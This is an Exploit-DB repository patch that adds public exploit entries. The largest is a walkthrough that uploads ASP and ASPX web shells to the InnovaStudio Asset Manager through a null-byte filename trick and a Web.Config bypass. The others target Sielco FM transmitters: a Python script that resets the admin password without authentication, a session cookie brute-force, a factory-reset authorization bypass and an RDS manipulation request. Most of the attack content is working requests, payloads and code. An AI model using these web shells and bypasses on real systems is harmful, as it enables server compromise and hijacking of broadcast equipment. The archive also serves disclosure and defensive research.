From 2f07358143ce98db0f5988a0a9a3379c20c13ab2 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Sat, 15 Apr 2023 00:16:19 +0000 Subject: [PATCH] DB: 2023-04-15 16 changes to exploits/shellcodes/ghdb InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal Sielco Analog FM Transmitter 2.12 - Remote Privilege Escalation Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking Sielco Analog FM Transmitter 2.12 - Cross-Site Request Forgery Sielco Analog FM Transmitter 2.12 - Improper Access Control Change Admin Password Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure Google Chrome Browser 111.0.5563.64 - AXPlatformNodeCocoa Fatal OOM/Crash (macOS) Bludit 4.0.0-rc-2 - Account takeover Microsoft Windows 11 - 'cmd.exe' Denial of Service --- exploits/asp/webapps/51362.txt | 330 ++++++++++++++++++++++++++++ exploits/hardware/remote/51366.txt | 74 +++++++ exploits/hardware/webapps/51363.txt | 59 +++++ exploits/hardware/webapps/51364.txt | 80 +++++++ exploits/hardware/webapps/51365.txt | 75 +++++++ exploits/hardware/webapps/51367.py | 105 +++++++++ exploits/hardware/webapps/51368.txt | 88 ++++++++ exploits/hardware/webapps/51369.txt | 118 ++++++++++ exploits/hardware/webapps/51370.txt | 67 ++++++ exploits/hardware/webapps/51371.txt | 54 +++++ exploits/macos/local/51361.txt | 319 +++++++++++++++++++++++++++ exploits/php/webapps/51360.txt | 90 ++++++++ exploits/windows/dos/51348.txt | 38 ---- files_exploits.csv | 13 +- ghdb.xml | 91 ++++++++ 15 files changed, 1562 insertions(+), 39 deletions(-) create mode 100644 exploits/asp/webapps/51362.txt create mode 100644 exploits/hardware/remote/51366.txt create mode 100644 exploits/hardware/webapps/51363.txt create mode 100644 exploits/hardware/webapps/51364.txt create mode 100644 exploits/hardware/webapps/51365.txt create mode 100755 exploits/hardware/webapps/51367.py create mode 100644 exploits/hardware/webapps/51368.txt create mode 100644 exploits/hardware/webapps/51369.txt create mode 100644 exploits/hardware/webapps/51370.txt create mode 100644 exploits/hardware/webapps/51371.txt create mode 100644 exploits/macos/local/51361.txt create mode 100644 exploits/php/webapps/51360.txt delete mode 100644 exploits/windows/dos/51348.txt diff --git a/exploits/asp/webapps/51362.txt b/exploits/asp/webapps/51362.txt new file mode 100644 index 000000000..586357f58 --- /dev/null +++ b/exploits/asp/webapps/51362.txt @@ -0,0 +1,330 @@ +# Exploit Title: InnovaStudio WYSIWYG Editor 5.4 - Unrestricted File Upload / Directory Traversal +# Date: 11/04/2023 +# Exploit Author: Zer0FauLT [admindeepsec@proton.me] +# Vendor Homepage: innovastudio.com +# Product: Asset Manager +# Version: <= Asset Manager ASP Version 5.4 +# Tested on: Windows 10 and Windows Server 2019 +# CVE : 0DAY + +################################################################################################## +# # +# ASP version, in i_upload_object_FSO.asp, line 234 # +# # +# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" # +# # +################################################################################################## +||==============================================================================|| +|| ((((1)))) || +|| || +|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... || +||==============================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0644 ] " +" " +" DIR PERMISSIONS : [ 0755 ] " +" " +" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +################################################################################################## + +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.asp" +Content-Type: application/octet-stream + +<%eval request("#11")%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +================================================================================================== +" ...[ RESPONCE ]... " +" " +" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. " +" " +================================================================================================== + + *** + +||================================================================================|| +|| ((((2)))) || +|| || +|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... || +|| || +||================================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0644 ] " +" " +" DIR PERMISSIONS : [ 0755 ] " +" " +" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +################################################################################################## + +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt" +Content-Type: application/octet-stream + +<%eval request("#11")%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +================================================================================================== +" >>> filename="shell.asp%00asp.txt" <<< " +" " +" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode " +" " +" or " +" " +" CTRL+Shift+U " +" " +" SEND! " +" " +================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] " +" " +" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] " +" " +================================================================================================== + + *** + +||==============================================================================|| +|| ((((3)))) || +|| || +|| ...:::NO WRITE PERMISSION!:::... || +|| || +|| ...:::Directory Traversal:::... || +|| || +||==============================================================================|| +################################################################################################## +" " +" FILE PERMISSIONS : [ 0600 ] " +" " +" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] " +" " +" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] " +" " +" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] " +" " +" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] " +" " +" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] " +" " +" " +################################################################################################## +########################################################################################################################################################## +# # +# What is the App_Data Folder useful? # +# App_Data contains application data files including .mdf database files, XML files, and other data store files. # +# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. # +# The App_Data folder is not public like the other website directories under the Home Directory. # +# Because it's a private directory, the IIS server hides it for security reasons. # +# Now, we will test whether such a directory exists. # +# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. # +# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. # +# So the directory will be public and it will be able to respond to external queries and run a shell. # +# # +########################################################################################################################################################## +================================================================================================== + +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt" +Content-Type: application/octet-stream + + + + + + + + + + + + + + + + + + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] " +" " +" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] " +" " +================================================================================================== +# Now we will upload your shell to the directory where we made ByPass. # +================================================================================================== +POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2 +Host: www.pentest.com +Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG +Content-Length: 473 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://www.pentest.com +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpCurrFolder2" + +C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="inpFilter" + + +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS +Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt" +Content-Type: application/octet-stream + +<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %> +<%var PAY:String= +Request["\x61\x62\x63\x64"];eval +(PAY,"\x75\x6E\x73\x61"+ +"\x66\x65");%> +------WebKitFormBoundaryFo1Ek0VVUzPm1AxS-- + +====================================================================================================== +" ...[ RESPONCE ]... " +" " +" OK! " +" " +" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] " +" " +" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] " +" " +========================================================================================================================================== +" " +" So what can we do if no directory on the site has write permission? " +" If not, we will test for vulnerabilities in the paths of other applications running on the server. " +" Sometimes this can be a mail service related vulnerability, " +" Sometimes also it can be a "Service Permissions" vulnerability. " +" Sometimes also it can be a "Binary Permissions " vulnerability. " +" Sometimes also it can be a "Weak Service Permissions" vulnerability. " +" Sometimes also it can be a "Unquoted Service Path" vulnerability. " +" Our limits are as much as our imagination... " +" *** 0DAY *** " +" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. " +" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. " +" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] " +" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] " +" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, " +" And then upload our shell file to the server by bypassing it. " +" This way, we will have full control over both the server and the mail service. " +" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] " +" " +========================================================================================================================================== \ No newline at end of file diff --git a/exploits/hardware/remote/51366.txt b/exploits/hardware/remote/51366.txt new file mode 100644 index 000000000..f93b255b0 --- /dev/null +++ b/exploits/hardware/remote/51366.txt @@ -0,0 +1,74 @@ + + + + + +
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51363.txt b/exploits/hardware/webapps/51363.txt new file mode 100644 index 000000000..554a61ece --- /dev/null +++ b/exploits/hardware/webapps/51363.txt @@ -0,0 +1,59 @@ +## Exploit Title: Sielco Analog FM Transmitter 2.12 - 'id' Cookie Brute Force Session Hijacking +## Exploit Author: LiquidWorm + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: 2.12 (EXC5000GX) + 2.12 (EXC120GX) + 2.11 (EXC300GX) + 2.10 (EXC1600GX) + 2.10 (EXC2000GX) + 2.08 (EXC1600GX) + 2.08 (EXC1000GX) + 2.07 (EXC3000GX) + 2.06 (EXC5000GX) + 1.7.7 (EXC30GT) + 1.7.4 (EXC300GT) + 1.7.4 (EXC100GT) + 1.7.4 (EXC5000GT) + 1.6.3 (EXC1000GT) + 1.5.4 (EXC120GT) + +Summary: Sielco designs and produces FM radio transmitters +for professional broadcasting. The in-house laboratory develops +standard and customised solutions to meet all needs. Whether +digital or analogue, each product is studied to ensure reliability, +resistance over time and a high standard of safety. Sielco +transmitters are distributed throughout the world and serve +many radios in Europe, South America, Africa, Oceania and China. + +Desc: The Cookie session ID 'id' is of an insufficient length and +can be exploited by brute force, which may allow a remote attacker +to obtain a valid session, bypass authentication and manipulate +the transmitter. + +Tested on: lwIP/2.1.1 + Web/3.0.3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5758 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5758.php + + +26.01.2023 + +-- + + +# Session values (len=5) + +Cookie: id=44189 +Cookie: id=37692 +Cookie: id=+6638 +Cookie: id=+3077 +... +... \ No newline at end of file diff --git a/exploits/hardware/webapps/51364.txt b/exploits/hardware/webapps/51364.txt new file mode 100644 index 000000000..d5b38de08 --- /dev/null +++ b/exploits/hardware/webapps/51364.txt @@ -0,0 +1,80 @@ + + + +CSRF Add Admin: +--------------- + + + +
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51365.txt b/exploits/hardware/webapps/51365.txt new file mode 100644 index 000000000..23f956afd --- /dev/null +++ b/exploits/hardware/webapps/51365.txt @@ -0,0 +1,75 @@ + + + + + +
+ + + + + + + + + + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/51367.py b/exploits/hardware/webapps/51367.py new file mode 100755 index 000000000..bf65c3ee4 --- /dev/null +++ b/exploits/hardware/webapps/51367.py @@ -0,0 +1,105 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authentication Bypass Exploit +## Exploit Author: LiquidWorm +# +# +# Sielco PolyEco Digital FM Transmitter 2.0.6 Authentication Bypass Exploit +# +# +# Vendor: Sielco S.r.l +# Product web page: https://www.sielco.org +# Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 +# PolyEco1000 CPU:1.9.4 FPGA:10.19 +# PolyEco1000 CPU:1.9.3 FPGA:10.19 +# PolyEco500 CPU:1.7.0 FPGA:10.16 +# PolyEco300 CPU:2.0.2 FPGA:10.19 +# PolyEco300 CPU:2.0.0 FPGA:10.19 +# +# Summary: PolyEco is the innovative family of high-end digital +# FM transmitters of Sielco. They are especially suited as high +# performance power system exciters or compact low-mid power +# transmitters. The same cabinet may in fact be fitted with 50, +# 100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +# 1000). +# +# All features can be controlled via the large touch-screen display +# 4.3" or remotely. Many advanced features are inside by default +# in the basic version such as: stereo and RDS encoder, audio +# change-over, remote-control via LAN and SNMP, "FFT" spectral +# analysis of the audio sources, SFN synchronization and much more. +# +# Desc: The application suffers from an authentication bypass and +# account takeover/lockout vulnerability that can be triggered by +# directly calling the users object and effectively modifying the +# password of the two constants user/role (user/admin). This can +# be exploited by an unauthenticated adversary by issuing a single +# POST request to the vulnerable endpoint and gain unauthorized +# access to the affected device with administrative privileges. +# +# Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2023-5769 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5769.php +# +# +# 26.01.2023 +# +# + + +import requests +print( ''' + .- _ _ -. + / / \\ \\ + ( ( (` (-o-) `) ) ) + \ \_ ` -+- ` _/ / + `- -+- -` + -+- + -+- + -+- + -+- + -+- + -+- + / \\ + ***************************************************** + ! Sielco PolyEco Authentication Bypass Script ! + ***************************************************** + + Please note that this script is for educational and + ethical purposes only. Using it for unauthorized + access or malicious activities is strictly prohibited + and can have serious legal and ethical consequences. + The responsibility of using this script in a lawful + and ethical manner lies solely with the user. The + author or creator of this script shall not be held + responsible for any unlawful or unethical activities + performed by the users. +''' ) +url = input( ' Enter the URL (e.g. http://host:8090): ' ) +if not 'http' in url : + url = 'http://{}'.format( url ) +user = input( ' Enter the desired role (e.g. user or admin): ') +if user not in [ 'user', 'admin' ] : + exit( ' Only \'user\' or \'admin\' please.' ) +password = input( ' Enter the desired password: ' ) +end = '/protect/users.htm' +payload = {} +if user == "user" : + payload[ 'pwd_admin' ] = '' + payload[ 'pwd_user' ] = password +elif user == 'admin' : + payload[ 'pwd_admin' ] = password + payload[ 'pwd_user' ] = '' +r = requests.post( url + end, data = payload ) +if r.status_code == 200 : + print( '\n MSG: OK.' ) +else: + print( '\n MSG: ERROR!' ) \ No newline at end of file diff --git a/exploits/hardware/webapps/51368.txt b/exploits/hardware/webapps/51368.txt new file mode 100644 index 000000000..cf6aad443 --- /dev/null +++ b/exploits/hardware/webapps/51368.txt @@ -0,0 +1,88 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset +## Exploit Author: LiquidWorm + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: Improper access control occurs when the application provides +direct access to objects based on user-supplied input. As a result +of this vulnerability attackers can bypass authorization and access +resources behind protected pages. + +Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5768 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php + + +26.01.2023 + +-- + + +index.htm: +---------- +54: function dologin() { +55: var hash = hex_md5($('#password').val() + id); +56: $.get('/login.cgi', { +57: user: $('#user').val(), +58: password: hash, +59: id: id +60: }).done(function (data) { +61: var dati = $.parseXML(data); +62: id = $(dati).find('id').text(); +63: user = $(dati).find('u').text(); +64: if (id == 0) +65: window.location.href = '/index.htm'; +66: else { +67: scriviCookie('polyeco', id, 180); +68: if (user >= 3) +69: window.location.href = '/protect/factory.htm'; +70: else +71: window.location.href = '/protect/index.htm'; +72: } +73: }); +74: } + + +The function 'dologin()' in index.htm is called when a user submits a login form. +It starts by calculating a hash of the user-entered password and a variable 'id' +using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi' +endpoint with the user's entered username, the calculated password hash and the +'id' variable as parameters. If the request is successful, the function parses the +XML data returned from the server, extracting the values of the 'id' and 'u' elements. +Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects +the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the +value of 'id' and expires after 180 days. + +After that it checks the value of the 'user' variable, if it's greater than or equal +to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the +user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side +JavaScript to always set the 'user' variable to a high value (4), or by tampering with +the data sent to the server during the login process to change the value of the 'user' +variable. It also works if the server's response variable 'user' is modified. \ No newline at end of file diff --git a/exploits/hardware/webapps/51369.txt b/exploits/hardware/webapps/51369.txt new file mode 100644 index 000000000..8e3e65c94 --- /dev/null +++ b/exploits/hardware/webapps/51369.txt @@ -0,0 +1,118 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Radio Data System POST Manipulation +## Exploit Author: LiquidWorm + + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: Improper access control occurs when the application provides +direct access to objects based on user-supplied input. As a result +of this vulnerability attackers can bypass authorization and access +resources behind protected pages. The application interface allows +users to perform certain actions via HTTP requests without performing +any validity checks to verify the requests. This can be exploited +to perform certain actions and manipulate the RDS text display. + +Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +Macedonian Information Security Research and Development Laboratory +Zero Science Lab - https://www.zeroscience.mk - @zeroscience + + +Advisory ID: ZSL-2023-5767 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php + + +26.01.2023 + +-- + + +POST /protect/rds.htm HTTP/1.1 +Host: RADIOFM + +rds_inta=1 +rds_intb=0 +rds_pi=381 +rds_ps=ZSL +rds_rta=www.zeroscience.mk +rds_rtb +rds_rtt=0 +rds_tp=0 +rds_tp=1 +rds_ta=0 +rds_ms=0 +rds_pty=4 +rds_ptyn= +rds_ecc=00 +rds_ct=0 +rds_level=90 +rds_psd=0 +rds_psd1 +rds_pst1=0 +rds_psd5 +rds_pst5=0 +rds_psd2 +rds_pst2=0 +rds_psd6 +rds_pst6=0 +rds_psd3 +rds_pst3=0 +rds_psd7 +rds_pst7=0 +rds_psd4 +rds_pst4=0 +rds_psd8 +rds_pst8=0 +rds_di_pty=0 +rds_di_cmp=0 +rds_di_cmp=1 +rds_di_st=0 +rds_di_art=0 +rds_di_art=1 +a0=90 +a1=9 +a2=26 +a3=115 +a4=0 +a5=0 +a6=0 +a7=0 +a8=0 +a9=0 +a10=0 +a11=0 +a12=0 +a13=0 +a14=0 +a15=0 +a16=0 +a17=0 +a18=0 +a19=0 +a20=0 +a21=0 +a22=0 +a23=0 +a24=0 \ No newline at end of file diff --git a/exploits/hardware/webapps/51370.txt b/exploits/hardware/webapps/51370.txt new file mode 100644 index 000000000..5f093f6ab --- /dev/null +++ b/exploits/hardware/webapps/51370.txt @@ -0,0 +1,67 @@ +## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Unauthenticated Information Disclosure +## Exploit Author: LiquidWorm + +Vendor: Sielco S.r.l +Product web page: https://www.sielco.org +Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 + PolyEco1000 CPU:1.9.4 FPGA:10.19 + PolyEco1000 CPU:1.9.3 FPGA:10.19 + PolyEco500 CPU:1.7.0 FPGA:10.16 + PolyEco300 CPU:2.0.2 FPGA:10.19 + PolyEco300 CPU:2.0.0 FPGA:10.19 + +Summary: PolyEco is the innovative family of high-end digital +FM transmitters of Sielco. They are especially suited as high +performance power system exciters or compact low-mid power +transmitters. The same cabinet may in fact be fitted with 50, +100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500, +1000). + +All features can be controlled via the large touch-screen display +4.3" or remotely. Many advanced features are inside by default +in the basic version such as: stereo and RDS encoder, audio +change-over, remote-control via LAN and SNMP, "FFT" spectral +analysis of the audio sources, SFN synchronization and much more. + +Desc: Sielco PolyEco is affected by an information disclosure +vulnerability due to improper access control enforcement. An +unauthenticated remote attacker can exploit this, via a specially +crafted request to gain access to sensitive information. + +Tested on: lwIP/2.1.1 